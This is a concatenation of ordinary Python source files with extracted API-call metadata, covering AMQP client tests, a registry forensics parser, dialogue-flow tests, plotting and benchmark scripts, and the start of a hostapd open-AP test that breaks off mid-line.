https://github.com/mosquito/aiormq/issues/10 """ channel = amqp_channel # type: aiormq.Channel exchange = uuid.uuid4().hex await channel.exchange_declare(exchange, exchange_type="topic") try: declare_ok = await channel.queue_declare(exclusive=True) await channel.queue_bind( declare_ok.queue, exchange, routing_key="test.5", ) for i in range(10): messages = [ asyncio.ensure_future(channel.basic_publish( b"test", exchange=exchange, routing_key="test.{}".format(i), )) for i in range(10) ] _, pending = await asyncio.wait(messages, timeout=0.2) assert not pending, "not all publishes were completed (confirmed)" await asyncio.sleep(0.05) finally: await channel.exchange_delete(exchange) async def test_exclusive_queue_locked(amqp_connection): channel0 = await amqp_connection.channel() channel1 = await amqp_connection.channel() qname = str(uuid.uuid4()) await channel0.queue_declare(qname, exclusive=True) try: await channel0.basic_consume(qname, print, exclusive=True) with pytest.raises(aiormq.exceptions.ChannelLockedResource): await channel1.queue_declare(qname) await channel1.basic_consume(qname, print, exclusive=True) finally: await channel0.queue_delete(qname) async def test_remove_writer_when_closed(amqp_channel: aiormq.Channel): with pytest.raises(aiormq.exceptions.ChannelClosed): await amqp_channel.queue_declare( "amq.forbidden_queue_name", auto_delete=True, ) with pytest.raises(aiormq.exceptions.ChannelInvalidStateError): await amqp_channel.queue_delete("amq.forbidden_queue_name") async def test_proxy_connection(proxy_connection, proxy: TCPProxy): channel = await proxy_connection.channel() # type: aiormq.Channel await channel.queue_declare(auto_delete=True) async def test_declare_queue_timeout(proxy_connection, proxy: TCPProxy): for _ in range(3): channel = await proxy_connection.channel() # type: aiormq.Channel qname = str(uuid.uuid4()) with proxy.slowdown(read_delay=5, write_delay=0): with pytest.raises(asyncio.TimeoutError): await channel.queue_declare( qname, auto_delete=True, timeout=0.5 )
[((257, 272), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (270, 272), False, 'import asyncio\n'), ((1354, 1369), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (1367, 1369), False, 'import asyncio\n'), ((3581, 3596), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (3594, 3596), False, 'import asyncio\n'), ((4831, 4843), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (4841, 4843), False, 'import uuid\n'), ((5774, 5786), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (5784, 5786), False, 'import uuid\n'), ((6250, 6296), 'pytest.raises', 'pytest.raises', (['aiormq.exceptions.ChannelClosed'], {}), '(aiormq.exceptions.ChannelClosed)\n', (6263, 6296), False, 'import pytest\n'), ((6418, 6475), 'pytest.raises', 'pytest.raises', (['aiormq.exceptions.ChannelInvalidStateError'], {}), '(aiormq.exceptions.ChannelInvalidStateError)\n', (6431, 6475), False, 'import pytest\n'), ((5936, 5990), 'pytest.raises', 'pytest.raises', (['aiormq.exceptions.ChannelLockedResource'], {}), '(aiormq.exceptions.ChannelLockedResource)\n', (5949, 5990), False, 'import pytest\n'), ((6930, 6942), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (6940, 6942), False, 'import uuid\n'), ((535, 581), 'aiormq.spec.Basic.Properties', 'aiormq.spec.Basic.Properties', ([], {'message_id': '"""123"""'}), "(message_id='123')\n", (563, 581), False, 'import aiormq\n'), ((1629, 1675), 'aiormq.spec.Basic.Properties', 'aiormq.spec.Basic.Properties', ([], {'message_id': '"""123"""'}), "(message_id='123')\n", (1657, 1675), False, 'import aiormq\n'), ((5391, 5426), 'asyncio.wait', 'asyncio.wait', (['messages'], {'timeout': '(0.2)'}), '(messages, timeout=0.2)\n', (5403, 5426), False, 'import asyncio\n'), ((5524, 5543), 'asyncio.sleep', 'asyncio.sleep', (['(0.05)'], {}), '(0.05)\n', (5537, 5543), False, 'import asyncio\n'), ((7020, 7055), 'pytest.raises', 'pytest.raises', (['asyncio.TimeoutError'], {}), '(asyncio.TimeoutError)\n', (7033, 7055), False, 'import pytest\n')]
culbertm/NSttyPython
nitro-python/nssrc/com/citrix/netscaler/nitro/resource/stat/mediaclassification/__init__.py
ff9f6aedae3fb8495342cd0fc4247c819cf47397
__all__ = ['mediaclassification_stats']
[]
joeghodsi/interview-questions
balanced_parens.py
3e4eb76891245ce978cb9171e87d60e3b292b0a8
''' Problem description: Given a string, determine whether or not the parentheses are balanced ''' def balanced_parens(str): ''' runtime: O(n) space : O(1) ''' if str is None: return True open_count = 0 for char in str: if char == '(': open_count += 1 elif char == ')': open_count -= 1 if open_count < 0: return False return open_count == 0
[]
pyllyukko/plaso
plaso/parsers/winreg_plugins/ccleaner.py
7533db2d1035ca71d264d6281ebd5db2d073c587
# -*- coding: utf-8 -*- """Parser for the CCleaner Registry key.""" import re from dfdatetime import time_elements as dfdatetime_time_elements from plaso.containers import events from plaso.containers import time_events from plaso.lib import definitions from plaso.parsers import winreg_parser from plaso.parsers.winreg_plugins import interface class CCleanerConfigurationEventData(events.EventData): """CCleaner configuration event data. Attributes: configuration (str): CCleaner configuration. key_path (str): Windows Registry key path. """ DATA_TYPE = 'ccleaner:configuration' def __init__(self): """Initializes event data.""" super(CCleanerConfigurationEventData, self).__init__( data_type=self.DATA_TYPE) self.configuration = None self.key_path = None class CCleanerUpdateEventData(events.EventData): """CCleaner update event data. Attributes: key_path (str): Windows Registry key path. """ DATA_TYPE = 'ccleaner:update' def __init__(self): """Initializes event data.""" super(CCleanerUpdateEventData, self).__init__(data_type=self.DATA_TYPE) self.key_path = None class CCleanerPlugin(interface.WindowsRegistryPlugin): """Gathers the CCleaner Keys for NTUSER hive. Known Windows Registry values within the CCleaner key: * (App)Cookies [REG_SZ], contains "True" if the cookies should be cleaned; * (App)Delete Index.dat files [REG_SZ] * (App)History [REG_SZ] * (App)Last Download Location [REG_SZ] * (App)Other Explorer MRUs [REG_SZ] * (App)Recent Documents [REG_SZ] * (App)Recently Typed URLs [REG_SZ] * (App)Run (in Start Menu) [REG_SZ] * (App)Temporary Internet Files [REG_SZ] * (App)Thumbnail Cache [REG_SZ] * CookiesToSave [REG_SZ] * UpdateKey [REG_SZ], contains a date and time formatted as: "MM/DD/YYYY hh:mm:ss [A|P]M", for example "07/13/2013 10:03:14 AM"; * WINDOW_HEIGHT [REG_SZ], contains the windows height in number of pixels; * WINDOW_LEFT [REG_SZ] * WINDOW_MAX [REG_SZ] * WINDOW_TOP [REG_SZ] * WINDOW_WIDTH [REG_SZ], contains the windows width in number of pixels; Also see: http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html """ NAME = 'ccleaner' DATA_FORMAT = 'CCleaner Registry data' FILTERS = frozenset([ interface.WindowsRegistryKeyPathFilter( 'HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner')]) # Date and time string formatted as: "MM/DD/YYYY hh:mm:ss [A|P]M" # for example "07/13/2013 10:03:14 AM" # TODO: determine if this is true for other locales. _UPDATE_DATE_TIME_RE = re.compile( r'([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) ' r'([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)') def _ParseUpdateKeyValue(self, parser_mediator, registry_value): """Parses the UpdateKey value. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. registry_value (dfwinreg.WinRegistryValue): Windows Registry value. Returns: dfdatetime_time_elements.TimeElements: date and time value or None if not available. """ if not registry_value.DataIsString(): parser_mediator.ProduceExtractionWarning( 'unsupported UpdateKey value data type: {0:s}'.format( registry_value.data_type_string)) return None date_time_string = registry_value.GetDataAsObject() if not date_time_string: parser_mediator.ProduceExtractionWarning('missing UpdateKey value data') return None re_match = self._UPDATE_DATE_TIME_RE.match(date_time_string) if not re_match: parser_mediator.ProduceExtractionWarning( 'unsupported UpdateKey value data: {0!s}'.format(date_time_string)) return None month, day_of_month, year, hours, minutes, seconds, part_of_day = ( re_match.groups()) try: year = int(year, 10) month = int(month, 10) day_of_month = int(day_of_month, 10) hours = int(hours, 10) minutes = int(minutes, 10) seconds = int(seconds, 10) except (TypeError, ValueError): parser_mediator.ProduceExtractionWarning( 'invalid UpdateKey date time value: {0!s}'.format(date_time_string)) return None if part_of_day == 'PM': hours += 12 time_elements_tuple = (year, month, day_of_month, hours, minutes, seconds) try: date_time = dfdatetime_time_elements.TimeElements( time_elements_tuple=time_elements_tuple) date_time.is_local_time = True except ValueError: parser_mediator.ProduceExtractionWarning( 'invalid UpdateKey date time value: {0!s}'.format( time_elements_tuple)) return None return date_time def ExtractEvents(self, parser_mediator, registry_key, **kwargs): """Extracts events from a Windows Registry key. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. registry_key (dfwinreg.WinRegistryKey): Windows Registry key. """ configuration = [] date_time = None for registry_value in registry_key.GetValues(): if not registry_value.name or not registry_value.data: continue if registry_value.name == 'UpdateKey': date_time = self._ParseUpdateKeyValue(parser_mediator, registry_value) else: value = registry_value.GetDataAsObject() configuration.append('{0:s}: {1!s}'.format(registry_value.name, value)) if date_time: event_data = CCleanerUpdateEventData() event_data.key_path = registry_key.path event = time_events.DateTimeValuesEvent( date_time, definitions.TIME_DESCRIPTION_UPDATE, time_zone=parser_mediator.timezone) parser_mediator.ProduceEventWithEventData(event, event_data) event_data = CCleanerConfigurationEventData() event_data.configuration = ' '.join(sorted(configuration)) or None event_data.key_path = registry_key.path event = time_events.DateTimeValuesEvent( registry_key.last_written_time, definitions.TIME_DESCRIPTION_WRITTEN) parser_mediator.ProduceEventWithEventData(event, event_data) winreg_parser.WinRegistryParser.RegisterPlugin(CCleanerPlugin)
[((6270, 6332), 'plaso.parsers.winreg_parser.WinRegistryParser.RegisterPlugin', 'winreg_parser.WinRegistryParser.RegisterPlugin', (['CCleanerPlugin'], {}), '(CCleanerPlugin)\n', (6316, 6332), False, 'from plaso.parsers import winreg_parser\n'), ((2611, 2731), 're.compile', 're.compile', (['"""([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) ([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)"""'], {}), "(\n '([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) ([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)'\n )\n", (2621, 2731), False, 'import re\n'), ((6092, 6198), 'plaso.containers.time_events.DateTimeValuesEvent', 'time_events.DateTimeValuesEvent', (['registry_key.last_written_time', 'definitions.TIME_DESCRIPTION_WRITTEN'], {}), '(registry_key.last_written_time, definitions\n .TIME_DESCRIPTION_WRITTEN)\n', (6123, 6198), False, 'from plaso.containers import time_events\n'), ((2318, 2412), 'plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter', 'interface.WindowsRegistryKeyPathFilter', (['"""HKEY_CURRENT_USER\\\\Software\\\\Piriform\\\\CCleaner"""'], {}), "(\n 'HKEY_CURRENT_USER\\\\Software\\\\Piriform\\\\CCleaner')\n", (2356, 2412), False, 'from plaso.parsers.winreg_plugins import interface\n'), ((4463, 4541), 'dfdatetime.time_elements.TimeElements', 'dfdatetime_time_elements.TimeElements', ([], {'time_elements_tuple': 'time_elements_tuple'}), '(time_elements_tuple=time_elements_tuple)\n', (4500, 4541), True, 'from dfdatetime import time_elements as dfdatetime_time_elements\n'), ((5709, 5829), 'plaso.containers.time_events.DateTimeValuesEvent', 'time_events.DateTimeValuesEvent', (['date_time', 'definitions.TIME_DESCRIPTION_UPDATE'], {'time_zone': 'parser_mediator.timezone'}), '(date_time, definitions.\n TIME_DESCRIPTION_UPDATE, time_zone=parser_mediator.timezone)\n', (5740, 5829), False, 'from plaso.containers import time_events\n')]
ejconlon/pushpluck
pushpluck/base.py
4e5b8bcff6fe3955e8f25638268569f901815b5a
from abc import ABCMeta, abstractmethod from dataclasses import dataclass from typing import Any, TypeVar X = TypeVar('X') class Closeable(metaclass=ABCMeta): @abstractmethod def close(self) -> None: """ Close this to free resources and deny further use. """ raise NotImplementedError() class Resettable(metaclass=ABCMeta): @abstractmethod def reset(self) -> None: """ Reset this to a known good state for further use. """ raise NotImplementedError() class Void: """ None is the type with 1 inhabitant, None. Void is the type with 0 inhabitants. """ def __init__(self) -> None: raise Exception('Cannot instantiate Void') def absurd(self) -> X: """ This allows you to trivially satisfy type checking by returning `void.absurd()` since it's impossible for `void` to exist in the first place. """ raise Exception('Absurd') @dataclass(frozen=True) class Unit: """ A simple type with one inhabitant (according to eq and hash). """ @staticmethod def instance() -> 'Unit': return _UNIT_SINGLETON _UNIT_SINGLETON = Unit() class MatchException(Exception): def __init__(self, value: Any) -> None: super().__init__(f'Failed to match value: {value}')
[((112, 124), 'typing.TypeVar', 'TypeVar', (['"""X"""'], {}), "('X')\n", (119, 124), False, 'from typing import Any, TypeVar\n'), ((941, 963), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (950, 963), False, 'from dataclasses import dataclass\n')]
CAB-LAB/cube-performance-test
test/cuberead/highres/test_default_high_res.py
0ca7dbb56b2937004fb63f8aafdff21fb76263d4
import time import pytest from test import config from test.cube_utils import CubeUtils ITERATIONS_NUM = getattr(config, 'iterations_num', 1) ROUNDS_NUM = getattr(config, 'rounds_num', 10) class TestDefaultHighRes: @pytest.fixture(scope="class", autouse=True) def cube_default(self): cube_utils = CubeUtils() cube_utils.generate_cube("default_high_res", 46, 2160, 4320) yield cube_utils # --------------- # Read spatially # --------------- @pytest.mark.benchmark( group="Cube reading for small area spatial analysis high-res", timer=time.perf_counter, disable_gc=True, warmup=False ) def test_read_default_high_res_135x135(self, benchmark, cube_default): benchmark.pedantic(cube_default.read_spatial, args=(135,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM) @pytest.mark.benchmark( group="Cube reading for large area spatial analysis high-res", timer=time.perf_counter, disable_gc=True, warmup=False ) def test_read_default_high_res_2160x2160(self, benchmark, cube_default): benchmark.pedantic(cube_default.read_spatial, args=(2160,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM) # --------------- # Read temporally # --------------- @pytest.mark.benchmark( group="Cube reading for subset temporal analysis high-res", timer=time.perf_counter, disable_gc=True, warmup=False ) def test_read_default_high_res_46x135x135(self, benchmark, cube_default): benchmark.pedantic(cube_default.read_temporal, args=(135,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM) @pytest.mark.benchmark( group="Cube reading for global temporal analysis high-res", timer=time.perf_counter, disable_gc=True, warmup=False ) def test_read_default_high_res_46x2160x2160(self, benchmark, cube_default): benchmark.pedantic(cube_default.read_temporal, args=(2160,), iterations=ITERATIONS_NUM, rounds=ROUNDS_NUM)
[((225, 268), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""class"""', 'autouse': '(True)'}), "(scope='class', autouse=True)\n", (239, 268), False, 'import pytest\n'), ((496, 646), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for small area spatial analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for small area spatial analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (517, 646), False, 'import pytest\n'), ((869, 1019), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for large area spatial analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for large area spatial analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (890, 1019), False, 'import pytest\n'), ((1312, 1459), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for subset temporal analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for subset temporal analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (1333, 1459), False, 'import pytest\n'), ((1686, 1833), 'pytest.mark.benchmark', 'pytest.mark.benchmark', ([], {'group': '"""Cube reading for global temporal analysis high-res"""', 'timer': 'time.perf_counter', 'disable_gc': '(True)', 'warmup': '(False)'}), "(group=\n 'Cube reading for global temporal analysis high-res', timer=time.\n perf_counter, disable_gc=True, warmup=False)\n", (1707, 1833), False, 'import pytest\n'), ((318, 329), 'test.cube_utils.CubeUtils', 'CubeUtils', ([], {}), '()\n', (327, 329), False, 'from test.cube_utils import CubeUtils\n')]
dyoshiha/mindmeld
tests/components/test_dialogue_flow.py
95f0e8482594f00040766a2ee687e9c9338f5a74
import pytest from mindmeld.components import Conversation def assert_reply(directives, templates, *, start_index=0, slots=None): """Asserts that the provided directives contain the specified reply Args: directives (list[dict[str, dict]]): list of directives returned by application templates (Union[str, Set[str]]): The reply must be a member of this set. start_index (int, optional): The index of the first client action associated with this reply. slots (dict, optional): The slots to fill the templates """ slots = slots or {} if isinstance(templates, str): templates = [templates] texts = set(map(lambda x: x.format(**slots), templates)) assert len(directives) >= start_index + 1 assert directives[start_index]['name'] == 'reply' assert directives[start_index]['payload']['text'] in texts def assert_target_dialogue_state(convo, target_dialogue_state): assert convo.params.target_dialogue_state == target_dialogue_state @pytest.mark.conversation def test_reprocess_handler(async_kwik_e_mart_app, kwik_e_mart_app_path): """Tests that the params are cleared in one trip from app to mm.""" convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True) convo.process('When does that open?') assert_target_dialogue_state(convo, 'send_store_hours_flow') directives = convo.process('are there any stores near me?').directives assert_target_dialogue_state(convo, 'send_store_hours_flow') assert_reply(directives, templates="I'm not sure. You haven't told me where you are!") @pytest.mark.conversation def test_default_handler(async_kwik_e_mart_app, kwik_e_mart_app_path): """Tests that the params are cleared in one trip from app to mm.""" convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True) convo.process('When does that open?') assert_target_dialogue_state(convo, 'send_store_hours_flow') directives = convo.process('Howdy!').directives assert_target_dialogue_state(convo, 'send_store_hours_flow') assert_reply(directives, templates='Sorry, I did not get you. Which store would you like to know about?') @pytest.mark.conversation def test_repeated_flow(async_kwik_e_mart_app, kwik_e_mart_app_path): """Tests that the params are cleared in one trip from app to mm.""" convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True) convo.process('When does that open?') assert_target_dialogue_state(convo, 'send_store_hours_flow') for i in range(2): directives = convo.process('When does that open?').directives assert_reply(directives, 'Which store would you like to know about?') assert_target_dialogue_state(convo, 'send_store_hours_flow') directives = convo.process('When does that open?').directives assert_reply(directives, 'Sorry I cannot help you. Please try again.') assert_target_dialogue_state(convo, None) @pytest.mark.conversation def test_intent_handler_and_exit_flow(async_kwik_e_mart_app, kwik_e_mart_app_path): """Tests that the params are cleared in one trip from app to mm.""" convo = Conversation(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path, force_sync=True) convo.process('When does that open?') assert_target_dialogue_state(convo, 'send_store_hours_flow') directives = convo.process('exit').directives assert_target_dialogue_state(convo, None) assert_reply(directives, templates=['Bye', 'Goodbye', 'Have a nice day.']) def assert_dialogue_state(dm, dialogue_state): for rule in dm.rules: if rule.dialogue_state == dialogue_state: return True return False def test_dialogue_flow_async(async_kwik_e_mart_app): @async_kwik_e_mart_app.dialogue_flow(domain='some_domain', intent='some_intent') async def some_handler(context, responder): pass assert some_handler.flow_state == 'some_handler_flow' assert 'some_handler' in some_handler.all_flows dm = some_handler.dialogue_manager assert_dialogue_state(dm, 'some_handler') assert_dialogue_state(dm, 'some_handler_flow') assert len(some_handler.rules) == 0 @some_handler.handle(intent='some_intent') async def some_flow_handler(context, responder): pass assert len(some_handler.rules) == 1 @some_handler.handle(intent='some_intent_2', exit_flow=True) async def some_flow_handler_2(context, responder): pass assert len(some_handler.rules) == 2 assert 'some_flow_handler_2' in some_handler.exit_flow_states def test_dialogue_flow(kwik_e_mart_app): @kwik_e_mart_app.dialogue_flow(domain='some_domain', intent='some_intent') def some_handler(context, responder): pass assert some_handler.flow_state == 'some_handler_flow' assert 'some_handler' in some_handler.all_flows dm = some_handler.dialogue_manager assert_dialogue_state(dm, 'some_handler') assert_dialogue_state(dm, 'some_handler_flow') assert len(some_handler.rules) == 0 @some_handler.handle(intent='some_intent') def some_flow_handler(context, responder): pass assert len(some_handler.rules) == 1 @some_handler.handle(intent='some_intent_2', exit_flow=True) def some_flow_handler_2(context, responder): pass assert len(some_handler.rules) == 2 assert 'some_flow_handler_2' in some_handler.exit_flow_states
[((1209, 1300), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (1221, 1300), False, 'from mindmeld.components import Conversation\n'), ((1835, 1926), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (1847, 1926), False, 'from mindmeld.components import Conversation\n'), ((2455, 2546), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (2467, 2546), False, 'from mindmeld.components import Conversation\n'), ((3273, 3364), 'mindmeld.components.Conversation', 'Conversation', ([], {'app': 'async_kwik_e_mart_app', 'app_path': 'kwik_e_mart_app_path', 'force_sync': '(True)'}), '(app=async_kwik_e_mart_app, app_path=kwik_e_mart_app_path,\n force_sync=True)\n', (3285, 3364), False, 'from mindmeld.components import Conversation\n')]
nextzlog/mine
mine/src/main/python/SVM.py
49ef0bea4796920d8696dc5f076f86c0ab17be80
import os,sys import webbrowser import numpy as np import matplotlib matplotlib.use('Agg') import matplotlib.cm as cm import matplotlib.pylab as plt from matplotlib import ticker plt.rcParams['font.family'] = 'monospace' fig = plt.figure() rect = fig.add_subplot(111, aspect='equal') data0 = np.loadtxt('data0.dat', delimiter=',') data1 = np.loadtxt('data1.dat', delimiter=',') dense = np.loadtxt('dense.dat', delimiter=',') ID = sys.argv[1] X = np.arange(-2.0, 2.05, 0.05) Y = np.arange(-2.0, 2.05, 0.05) Xm, Ym = np.meshgrid(X, Y) vmin, vmax = dense.min(), dense.max() if vmin * vmax < 0: vmin = -abs(max(-vmin, vmax)) vmax = +abs(max(-vmin, vmax)) cr = rect.imshow(dense.reshape((len(Y), len(X))), extent=(X[0], X[-1], Y[0], Y[-1]), vmin=vmin, vmax=vmax, cmap=cm.coolwarm, origin='lower') plt.contour(Xm, Ym, dense, levels=[-1, 1], cmap=cm.bwr, linestyles='dashed', linewidths=[2,2]) plt.contour(Xm, Ym, dense, levels=[0], colors='black', linestyles='dashed', linewidths=[2]) cb = plt.colorbar(cr, format='%+.1e') cb.solids.set_edgecolor('face') cb.set_ticks(ticker.LinearLocator(6)) cb.ax.tick_params(labelsize=12) rect.scatter(data0[:,0], data0[:,1], marker='v', facecolor='red', edgecolor='black', s=30, lw=1) rect.scatter(data1[:,0], data1[:,1], marker='^', facecolor='blue', edgecolor='black', s=30, lw=1) plt.xlim(X[0], X[-1]) plt.ylim(Y[0], Y[-1]) plt.xlabel("") plt.ylabel("") plt.grid(ls='dotted') plt.savefig('{}.svg'.format(ID), bbox_inches='tight', pad_inches=0.1) plt.savefig('{}.eps'.format(ID), bbox_inches='tight', pad_inches=0.1) os.remove('dense.dat') os.remove('data0.dat') os.remove('data1.dat') webbrowser.open('file://{}'.format(os.path.realpath('{}.svg'.format(sys.argv[1]))))
[((69, 90), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (83, 90), False, 'import matplotlib\n'), ((228, 240), 'matplotlib.pylab.figure', 'plt.figure', ([], {}), '()\n', (238, 240), True, 'import matplotlib.pylab as plt\n'), ((293, 331), 'numpy.loadtxt', 'np.loadtxt', (['"""data0.dat"""'], {'delimiter': '""","""'}), "('data0.dat', delimiter=',')\n", (303, 331), True, 'import numpy as np\n'), ((340, 378), 'numpy.loadtxt', 'np.loadtxt', (['"""data1.dat"""'], {'delimiter': '""","""'}), "('data1.dat', delimiter=',')\n", (350, 378), True, 'import numpy as np\n'), ((387, 425), 'numpy.loadtxt', 'np.loadtxt', (['"""dense.dat"""'], {'delimiter': '""","""'}), "('dense.dat', delimiter=',')\n", (397, 425), True, 'import numpy as np\n'), ((447, 474), 'numpy.arange', 'np.arange', (['(-2.0)', '(2.05)', '(0.05)'], {}), '(-2.0, 2.05, 0.05)\n', (456, 474), True, 'import numpy as np\n'), ((479, 506), 'numpy.arange', 'np.arange', (['(-2.0)', '(2.05)', '(0.05)'], {}), '(-2.0, 2.05, 0.05)\n', (488, 506), True, 'import numpy as np\n'), ((516, 533), 'numpy.meshgrid', 'np.meshgrid', (['X', 'Y'], {}), '(X, Y)\n', (527, 533), True, 'import numpy as np\n'), ((795, 894), 'matplotlib.pylab.contour', 'plt.contour', (['Xm', 'Ym', 'dense'], {'levels': '[-1, 1]', 'cmap': 'cm.bwr', 'linestyles': '"""dashed"""', 'linewidths': '[2, 2]'}), "(Xm, Ym, dense, levels=[-1, 1], cmap=cm.bwr, linestyles='dashed',\n linewidths=[2, 2])\n", (806, 894), True, 'import matplotlib.pylab as plt\n'), ((890, 985), 'matplotlib.pylab.contour', 'plt.contour', (['Xm', 'Ym', 'dense'], {'levels': '[0]', 'colors': '"""black"""', 'linestyles': '"""dashed"""', 'linewidths': '[2]'}), "(Xm, Ym, dense, levels=[0], colors='black', linestyles='dashed',\n linewidths=[2])\n", (901, 985), True, 'import matplotlib.pylab as plt\n'), ((987, 1019), 'matplotlib.pylab.colorbar', 'plt.colorbar', (['cr'], {'format': '"""%+.1e"""'}), "(cr, format='%+.1e')\n", (999, 1019), True, 'import matplotlib.pylab as plt\n'), ((1318, 1339), 'matplotlib.pylab.xlim', 'plt.xlim', (['X[0]', 'X[-1]'], {}), '(X[0], X[-1])\n', (1326, 1339), True, 'import matplotlib.pylab as plt\n'), ((1340, 1361), 'matplotlib.pylab.ylim', 'plt.ylim', (['Y[0]', 'Y[-1]'], {}), '(Y[0], Y[-1])\n', (1348, 1361), True, 'import matplotlib.pylab as plt\n'), ((1362, 1376), 'matplotlib.pylab.xlabel', 'plt.xlabel', (['""""""'], {}), "('')\n", (1372, 1376), True, 'import matplotlib.pylab as plt\n'), ((1377, 1391), 'matplotlib.pylab.ylabel', 'plt.ylabel', (['""""""'], {}), "('')\n", (1387, 1391), True, 'import matplotlib.pylab as plt\n'), ((1392, 1413), 'matplotlib.pylab.grid', 'plt.grid', ([], {'ls': '"""dotted"""'}), "(ls='dotted')\n", (1400, 1413), True, 'import matplotlib.pylab as plt\n'), ((1554, 1576), 'os.remove', 'os.remove', (['"""dense.dat"""'], {}), "('dense.dat')\n", (1563, 1576), False, 'import os, sys\n'), ((1577, 1599), 'os.remove', 'os.remove', (['"""data0.dat"""'], {}), "('data0.dat')\n", (1586, 1599), False, 'import os, sys\n'), ((1600, 1622), 'os.remove', 'os.remove', (['"""data1.dat"""'], {}), "('data1.dat')\n", (1609, 1622), False, 'import os, sys\n'), ((1065, 1088), 'matplotlib.ticker.LinearLocator', 'ticker.LinearLocator', (['(6)'], {}), '(6)\n', (1085, 1088), False, 'from matplotlib import ticker\n')]
rsrdesarrollo/sarna
sarna/report_generator/scores.py
0c1f44e06a932520b70e505585a5469b77f6302e
from sarna.model.enums import Score, Language from sarna.report_generator import make_run from sarna.report_generator.locale_choice import locale_choice from sarna.report_generator.style import RenderStyle def score_to_docx(score: Score, style: RenderStyle, lang: Language): ret = make_run(getattr(style, score.name.lower()), locale_choice(score, lang)) for warn in style._warnings: # TODO: something print(warn) return ret
[((332, 358), 'sarna.report_generator.locale_choice.locale_choice', 'locale_choice', (['score', 'lang'], {}), '(score, lang)\n', (345, 358), False, 'from sarna.report_generator.locale_choice import locale_choice\n')]
waittrue/wireless
tests/hwsim/test_ap_open.py
3c64f015dc62aec4da0b696f45cc4bcf41594c5d
# Open mode AP tests # Copyright (c) 2014, Qualcomm Atheros, Inc. # # This software may be distributed under the terms of the BSD license. # See README for more details. import logging logger = logging.getLogger() import struct import subprocess import time import os import hostapd import hwsim_utils from tshark import run_tshark from utils import alloc_fail from wpasupplicant import WpaSupplicant def test_ap_open(dev, apdev): """AP with open mode (no security) configuration""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412", bg_scan_period="0") ev = hapd.wait_event([ "AP-STA-CONNECTED" ], timeout=5) if ev is None: raise Exception("No connection event received from hostapd") hwsim_utils.test_connectivity(dev[0], hapd) dev[0].request("DISCONNECT") ev = hapd.wait_event([ "AP-STA-DISCONNECTED" ], timeout=5) if ev is None: raise Exception("No disconnection event received from hostapd") def test_ap_open_packet_loss(dev, apdev): """AP with open mode configuration and large packet loss""" params = { "ssid": "open", "ignore_probe_probability": "0.5", "ignore_auth_probability": "0.5", "ignore_assoc_probability": "0.5", "ignore_reassoc_probability": "0.5" } hapd = hostapd.add_ap(apdev[0]['ifname'], params) for i in range(0, 3): dev[i].connect("open", key_mgmt="NONE", scan_freq="2412", wait_connect=False) for i in range(0, 3): dev[i].wait_connected(timeout=20) def test_ap_open_unknown_action(dev, apdev): """AP with open mode configuration and unknown Action frame""" hapd = hostapd.add_ap(apdev[0]['ifname'], { "ssid": "open" }) dev[0].connect("open", key_mgmt="NONE", scan_freq="2412") bssid = apdev[0]['bssid'] cmd = "MGMT_TX {} {} freq=2412 action=765432".format(bssid, bssid) if "FAIL" in dev[0].request(cmd): raise Exception("Could not send test Action frame") ev = 